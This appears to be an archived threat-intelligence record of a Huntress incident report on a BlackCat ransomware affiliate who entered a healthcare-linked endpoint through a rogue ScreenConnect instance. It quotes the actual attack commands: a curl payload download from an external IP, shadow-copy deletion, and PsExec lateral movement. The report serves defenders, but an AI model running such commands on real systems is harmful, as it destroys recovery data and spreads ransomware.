{
	"id": "2e6c8ca7-a873-40ee-9a60-011891d9e1b1",
	"created_at": "2026-04-06T00:17:29.295007Z",
	"updated_at": "2026-04-10T13:12:26.342492Z",
	"deleted_at": null,
	"sha1_hash": "aaaf557806be6c849e74424ace8bf8c780e1c67c",
	"title": "BlackCat Ransomware Affiliate TTPs | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 52257,
	"plain_text": "BlackCat Ransomware Affiliate TTPs | Huntress\r\nArchived: 2026-04-02 10:46:50 UTC\r\nBackground\r\nOn December 19, 2023, the Justice Department Office of Public Affairs issued a press release indicating that the\r\nFBI had “disrupted the ALPHV/BlackCat ransomware variant.” This variant of ransomware is offered to affiliates\r\nas “ransomware-as-a-service” (RaaS). The FBI also developed a decryption tool that was made available to\r\norganizations impacted by this RaaS variant, in an effort to help them recover and resume business operations. \r\nOn February 19, 2024, ConnectWise published a security advisory for ScreenConnect version 23.9.8, referencing\r\ntwo vulnerabilities and software weaknesses. Two days later, on February 21, Huntress published a blog\r\nexplaining the ScreenConnect authentication bypass.\r\nOn February 27, Wired.com published an article addressing how ransomware groups were “bouncing back faster”\r\nfollowing law enforcement disruption. On the same day, the Cybersecurity \u0026 Infrastructure Security Agency\r\n(CISA) published an advisory regarding the ALPHV/BlackCat ransomware, and included references to\r\nScreenConnect (see table 4, “Network Indicators”, in the advisory).\r\nThe Attack\r\nHuntress has an extremely diverse customer base, spanning a wide range of geographic locations and business\r\nverticals. On February 22, 2024, Huntress SOC analysts responded to alerts from an endpoint, apparently\r\nassociated with the healthcare community, indicating that Ransomware Canary files had been modified. A closer\r\nlook identified a compromised ScreenConnect instance, as well as Huntress Managed Antivirus alerts, indicating\r\nthat an attempt had been made to drop a ransomware executable file, identified as “BlackCat,” on the endpoint.\r\nThe endpoint was identified as “apparently” associated with the healthcare community, based on the customer\r\nname. As the investigation proceeded, the MSP partner stated that the endpoint had been removed from the\r\ncustomer environment and given to someone else without their knowledge. Even so, the agent continued to report\r\nback to the Huntress infrastructure and generate alerts. \r\nA deeper investigation into the endpoint revealed that the endpoint had two ScreenConnect instances running.\r\nFrom the available logs, the first ScreenConnect instance, which reported back to the MSP infrastructure and was\r\nlikely legitimate, was installed on November 10, 2021. At that time, the installed ScreenConnect version was\r\n20.10.957.7556. On February 20, 2024, this instance was updated to version 23.9.8.8811.\r\nThe second ScreenConnect instance, which had been identified as likely being a compromised installation, was\r\ninstalled on March 28, 2022. At the time, the version was 21.15.6764.8075. This version number was still being\r\nreported in log messages as recently as February 10, 2024. Further, this ScreenConnect instance connected to\r\nREDACTED.ddns.net.\r\nhttps://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\r\nPage 1 of 4\n\nAttack Timing\r\nThe threat actor accessed the endpoint via the second ScreenConnect instance. Available logs indicated that\r\nshortly after the instance was installed on March 28, 2022, a specific username connected to the instance; those\r\nsame logs indicated sequences of the username being used to connect, and then later disconnecting until July 29,\r\n2022. From that point until February 10, 2024, the only log messages indicated that this ScreenConnect instance\r\nexperienced SocketException errors, and likely failed to connect to REDACTED.ddns.net. On February 10, 2024,\r\nlogs illustrated a number of application errors and popup messages associated with this ScreenConnect instance;\r\nhowever, the logs do not provide sufficient detail to enumerate the specific issue the application encountered. \r\nOn February 22, 2024, a new username, chlsln14, connected to the ScreenConnect instance. At this point, the\r\nversion of the ScreenConnect instance was still reported, via EDR telemetry, as 21.15.6764.8075. At 14:09:41\r\nUTC, the following command was executed:\r\ncurl  http://94.131.109[.]54:6531/iw0pjCKEzADKTMA5Xkv8ZxS6.exe -O\r\nTwenty-three seconds later, the file C:\\Windows\\System32\\iw0pjCKEzADKTMA5Xkv8ZxS6.exe was detected\r\nby Windows Defender, and the file was successfully quarantined at 14:10:31 UTC. \r\nAt 14:11:46 UTC, the Windows Defender SpyNetReporting value was changed from 2 to 0, essentially disabling\r\nthe functionality. As there was no associated command line process observed in EDR telemetry, this modification\r\nwas likely the result of graphical user interface (GUI) interaction; that is to say that the threat actor likely made the\r\nmodification via the user interface. Following this log entry, there were several consecutive SecurityCenter log\r\nentries indicating that the state of Windows Defender was “snoozed.” \r\nAt 14:11:56 UTC, the original curl command was again executed, and appears to have succeeded because 23\r\nseconds later, the following command was launched:\r\niw0pjCKEzADKTMA5Xkv8ZxS6.exe  --access-token\r\nd72766a868fef87c0c073c1ec3b6a92b7daed7313b81ee6523386049f768b09d\r\nFor the uninitiated, one of the aspects of RaaS ransomware products is that the executable files will often contain\r\nembedded commands used to disable security products and obviate recovery. After all, how effective is\r\nransomware deployment if the impacted organization can simply recover by reverting the last restore point or\r\nvolume shadow copy? As such, once the ransomware executable was launched, the embedded processes were\r\nlaunched as child processes of iw0pjCKEzADKTMA5Xkv8ZxS6.exe, and many were detected by the Huntress\r\nplatform. \r\nThe commands observed via EDR telemetry included the following:\r\nvssadmin.exe Delete Shadows /all /quiet\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters /v\r\nMaxMpxCt /d 65535 /t REG_DWORD /f\r\niisreset.exe /stop\r\nhttps://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\r\nPage 2 of 4\n\nwmic.exe  Shadowcopy Delete\r\nThe reg add command modifying the MaxMpxCt value increases the number of permitted outstanding network\r\nrequests, apparently optimizing the file sharing network to handle a higher volume of traffic. \r\nAt this point, logs indicated that the chlsln14 user disconnected from the ScreenConnect session, and the\r\nransomware executable continued to run. Subsequent to the above commands, Huntress EDR telemetry illustrated\r\nseveral instances of the following command:\r\nC:\\Windows\\TEMP\\psexec.exe\" -nobanner -accepteula \\\\\u003cNetBIOS Name\u003e -u \u003cDOMAIN\u003e\\Administrator -\r\np \u003cpassword\u003e -s -d -f -c C:\\Windows\\system32\\iw0pjCKEzADKTMA5Xkv8ZxS6.exe --access-token\r\nd72766a868fef87c0c073c1ec3b6a92b7daed7313b81ee6523386049f768b09d --no-prop-servers \\\\\u003cNetBIOS\r\nName\u003e --propagated\r\nThese commands, which were child processes of the ransomware executable process, were clearly intended to\r\nallow the ransomware to move laterally to other endpoints in the infrastructure. Following these commands,\r\nWindows Event Log records indicated instances of successful propagation to the additional endpoints, all of which\r\nutilized the 10.x.x.x IP addressing scheme. This was very important, as the \u003cDOMAIN\u003e field and NetBIOS\r\nnames of remote endpoints could not be directly associated with the Huntress customer. Further, that Huntress\r\ncustomer utilized the 192.168.x.x IP addressing scheme within their infrastructure. Finally, during the\r\ninvestigation, no other endpoints within the Huntress customer’s infrastructure showed similar signs of\r\ncompromise, nor of file encryption.\r\nSummary\r\nThe threat actor was connected to the endpoint via the second identified ScreenConnect instance for just under\r\nthree minutes, and during that time was able to download a copy of the ransomware executable to the endpoint,\r\nreact to the file being quarantined by temporarily disabling Windows Defender, and then downloading the\r\nexecutable file again and successfully launching it. The ransomware executable file, being a RaaS product,\r\ncontained a number of embedded commands intended to inhibit or obviate recovery, as well as embedded\r\ncommands and credentials that allowed the ransomware executable to move laterally within the impacted\r\ninfrastructure. The commands allowed the executable to target named endpoints specific to the infrastructure in\r\nwhich the endpoint resided, indicating that the infrastructure was familiar to the threat actor.\r\nThis incident clearly demonstrates the need for an accurate, up-to-date asset inventory, one that includes not just\r\nphysical and virtual systems, but also all available applications and services, for patching purposes. It also\r\ndemonstrates the need for attack surface reduction, where administrators restrict access to or simply remove\r\nunnecessary applications and services, so they can provide either an easy, alternate means of access, or a means to\r\naccess the endpoint that bypasses protection mechanisms such as MFA.\r\nIndicators\r\nUse of curl.exe\r\n94.131.109[.]54:6531 - file download\r\nhttps://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\r\nPage 3 of 4\n\niw0pjCKEzADKTMA5Xkv8ZxS6.exe - ransomware executable\r\nRaaS commands:\r\nvssadmin.exe Delete Shadows /all /quiet\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters /v\r\nMaxMpxCt /d 65535 /t REG_DWORD /f\r\niisreset.exe /stop\r\nwmic.exe  Shadowcopy Delete\r\npsexec.exe\r\nMITRE ATT\u0026CK Mapping\r\nInitial Access - T1190, Exploit Public Facing Application (likely); T1078.002, Valid Domain Accounts\r\nExecution - T1059.003, Windows Command Shell\r\nDefense Evasion - T1562.001, Disable/Modify Tools\r\nPrivilege Escalation - T1078.002, Valid Domain Accounts\r\nImpact - T1486, Data Encrypted For Impact \r\nImpact - T1490, Inhibit System Recovery\r\nSource: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\r\nhttps://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps"
	],
	"report_names": [
		"blackcat-ransomware-affiliate-ttps"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434649,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aaaf557806be6c849e74424ace8bf8c780e1c67c.pdf",
		"text": "https://archive.orkl.eu/aaaf557806be6c849e74424ace8bf8c780e1c67c.txt",
		"img": "https://archive.orkl.eu/aaaf557806be6c849e74424ace8bf8c780e1c67c.jpg"
	}
}